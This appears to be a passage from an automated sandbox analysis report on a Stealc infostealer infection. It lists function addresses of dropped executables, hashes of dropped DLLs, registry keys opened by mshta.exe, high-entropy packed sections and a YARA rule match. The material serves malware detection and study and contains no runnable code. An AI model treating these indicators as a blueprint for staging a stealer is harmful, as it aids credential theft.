                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4E0E203_2_6C4E0E20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C40AEC03_2_6C40AEC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4A0EC03_2_6C4A0EC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C486E903_2_6C486E90
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46EF403_2_6C46EF40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C2F703_2_6C4C2F70
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C406F103_2_6C406F10
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C540F203_2_6C540F20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C400FE03_2_6C400FE0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DEFF03_2_6C4DEFF0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C548FB03_2_6C548FB0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C40EFB03_2_6C40EFB0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D48403_2_6C4D4840
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4508203_2_6C450820
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C48A8203_2_6C48A820
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5068E03_2_6C5068E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4389603_2_6C438960
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4569003_2_6C456900
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C51C9E03_2_6C51C9E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4349F03_2_6C4349F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4909A03_2_6C4909A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4BA9A03_2_6C4BA9A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C09B03_2_6C4C09B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C47CA703_2_6C47CA70
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4AEA003_2_6C4AEA00
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B8A303_2_6C4B8A30
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C47EA803_2_6C47EA80
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C506BE03_2_6C506BE0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4A0BA03_2_6C4A0BA0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4184603_2_6C418460
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4644203_2_6C464420
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C48A4303_2_6C48A430
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4464D03_2_6C4464D0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C49A4D03_2_6C49A4D0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C52A4803_2_6C52A480
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5485503_2_6C548550
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4585403_2_6C458540
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5045403_2_6C504540
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4625603_2_6C462560
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4A05703_2_6C4A0570
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3F45B03_2_6C3F45B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4CA5E03_2_6C4CA5E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C48E5F03_2_6C48E5F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C45C6503_2_6C45C650
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4246D03_2_6C4246D0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C45E6E03_2_6C45E6E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C49E6E03_2_6C49E6E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4807003_2_6C480700
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C42A7D03_2_6C42A7D0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C44E0703_2_6C44E070
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4CC0003_2_6C4CC000
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C80103_2_6C4C8010
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3F80903_2_6C3F8090
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4100B03_2_6C4100B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DC0B03_2_6C4DC0B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4681403_2_6C468140
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4761303_2_6C476130
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4E41303_2_6C4E4130
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4001E03_2_6C4001E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4982503_2_6C498250
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4882603_2_6C488260
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4CA2103_2_6C4CA210
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D82203_2_6C4D8220
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5862C03_2_6C5862C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D22A03_2_6C4D22A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4CE2B03_2_6C4CE2B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4083403_2_6C408340
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5423703_2_6C542370
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4023703_2_6C402370
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C51C3603_2_6C51C360
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4963703_2_6C496370
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4723203_2_6C472320
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4543E03_2_6C4543E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4323A03_2_6C4323A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C45E3B03_2_6C45E3B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C403C403_2_6C403C40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C529C403_2_6C529C40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C411C303_2_6C411C30
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C53DCD03_2_6C53DCD0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C1CE03_2_6C4C1CE0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C463D003_2_6C463D00
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D1DC03_2_6C4D1DC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3F3D803_2_6C3F3D80
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C549D903_2_6C549D90
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C55BE703_2_6C55BE70
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C585E603_2_6C585E60
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C50DE103_2_6C50DE10
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C423EC03_2_6C423EC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3F5F303_2_6C3F5F30
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C435F203_2_6C435F20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C557F203_2_6C557F20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C51DFC03_2_6C51DFC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C583FC03_2_6C583FC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4ABFF03_2_6C4ABFF0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C421F903_2_6C421F90
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C45D8103_2_6C45D810
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C40D8E03_2_6C40D8E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4338E03_2_6C4338E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C55B8F03_2_6C55B8F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DF8F03_2_6C4DF8F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C47F9603_2_6C47F960
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4BD9603_2_6C4BD960
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C54F9003_2_6C54F900
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B59203_2_6C4B5920
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4999C03_2_6C4999C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4399D03_2_6C4399D0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4659F03_2_6C4659F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4979F03_2_6C4979F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4119803_2_6C411980
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D19903_2_6C4D1990
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C589A503_2_6C589A50
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C43FA103_2_6C43FA10
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4FDA303_2_6C4FDA30
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C401AE03_2_6C401AE0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DDAB03_2_6C4DDAB0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DFB603_2_6C4DFB60
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C44BB203_2_6C44BB20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C447BF03_2_6C447BF0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3F1B803_2_6C3F1B80
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4E5B903_2_6C4E5B90
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C459BA03_2_6C459BA0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C9BB03_2_6C4C9BB0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C48D4103_2_6C48D410
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4E94303_2_6C4E9430
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4014E03_2_6C4014E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5814A03_2_6C5814A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C54F5103_2_6C54F510
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4675003_2_6C467500
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4155103_2_6C415510
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4855F03_2_6C4855F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4395903_2_6C439590
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4556403_2_6C455640
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4196503_2_6C419650
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4296003_2_6C429600
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4776103_2_6C477610
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4316A03_2_6C4316A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4696A03_2_6C4696A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46D7103_2_6C46D710
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4237203_2_6C423720
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D97203_2_6C4D9720
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5437C03_2_6C5437C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C48B7A03_2_6C48B7A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4090503_2_6C409050
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4AF0503_2_6C4AF050
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C44B0203_2_6C44B020
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3FD0503_2_6C3FD050
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B70903_2_6C4B7090
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C44F1503_2_6C44F150
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C31203_2_6C4C3120
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4631C03_2_6C4631C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4131E03_2_6C4131E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5352703_2_6C535270
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C72603_2_6C4C7260
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C52203_2_6C4C5220
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4052F03_2_6C4052F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4CF2F03_2_6C4CF2F0
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E75C835_2_00E75C83
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E7735A5_2_00E7735A
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00EB88605_2_00EB8860
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E74DE05_2_00E74DE0
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E74B305_2_00E74B30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F978BB6_2_00F978BB
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F988606_2_00F98860
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F970496_2_00F97049
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F931A86_2_00F931A8
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F54B306_2_00F54B30
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F54DE06_2_00F54DE0
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F92D106_2_00F92D10
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F9779B6_2_00F9779B
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F87F366_2_00F87F36
                                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: String function: 00E880C0 appears 130 times
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00F680C0 appears 130 times
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: String function: 6C423620 appears 120 times
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: String function: 6C429B10 appears 118 times
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: String function: 6C45C5E0 appears 35 times
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: String function: 6C539F30 appears 54 times
                                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                    Source: EdYEXasNiR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
                                    Source: EdYEXasNiR.exeStatic PE information: Section: ZLIB complexity 0.9999421772203947
                                    Source: EdYEXasNiR.exeStatic PE information: Section: ulqubmxb ZLIB complexity 0.9950317531136087
                                    Source: random[3].exe.18.drStatic PE information: Section: ZLIB complexity 0.9997622841282895
                                    Source: random[3].exe.18.drStatic PE information: Section: sxcdrnzu ZLIB complexity 0.994340416603802
                                    Source: 95ba65f98f.exe.18.drStatic PE information: Section: ZLIB complexity 0.9997622841282895
                                    Source: 95ba65f98f.exe.18.drStatic PE information: Section: sxcdrnzu ZLIB complexity 0.994340416603802
                                    Source: random[4].exe.18.drStatic PE information: Section: rpnbigxq ZLIB complexity 0.9902602964512406
                                    Source: ad25d67005.exe.18.drStatic PE information: Section: .bss ZLIB complexity 1.0003249845551894
                                    Source: random[5].exe.18.drStatic PE information: Section: .bss ZLIB complexity 1.0003249845551894
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: Section: habslsfa ZLIB complexity 0.9942491947741748
                                    Source: random[4].exe1.18.drStatic PE information: Section: habslsfa ZLIB complexity 0.9942491947741748
                                    Source: e18644e148.exe.18.drStatic PE information: Section: rpnbigxq ZLIB complexity 0.9902602964512406
                                    Source: random[3].exe2.18.drStatic PE information: Section: ZLIB complexity 0.9999614514802632
                                    Source: random[3].exe2.18.drStatic PE information: Section: yxdjfvbh ZLIB complexity 0.9946813540090772
                                    Source: 8663788bd2.exe.18.drStatic PE information: Section: ZLIB complexity 0.9999614514802632
                                    Source: 8663788bd2.exe.18.drStatic PE information: Section: yxdjfvbh ZLIB complexity 0.9946813540090772
                                    Source: random[1].exe0.18.drStatic PE information: Section: .bss ZLIB complexity 1.0003244500411184
                                    Source: 64252d274d.exe.18.drStatic PE information: Section: .bss ZLIB complexity 1.0003244500411184
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: Section: ZLIB complexity 0.9981477744464945
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: Section: ZLIB complexity 0.99796875
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: Section: .data ZLIB complexity 0.9965319237854804
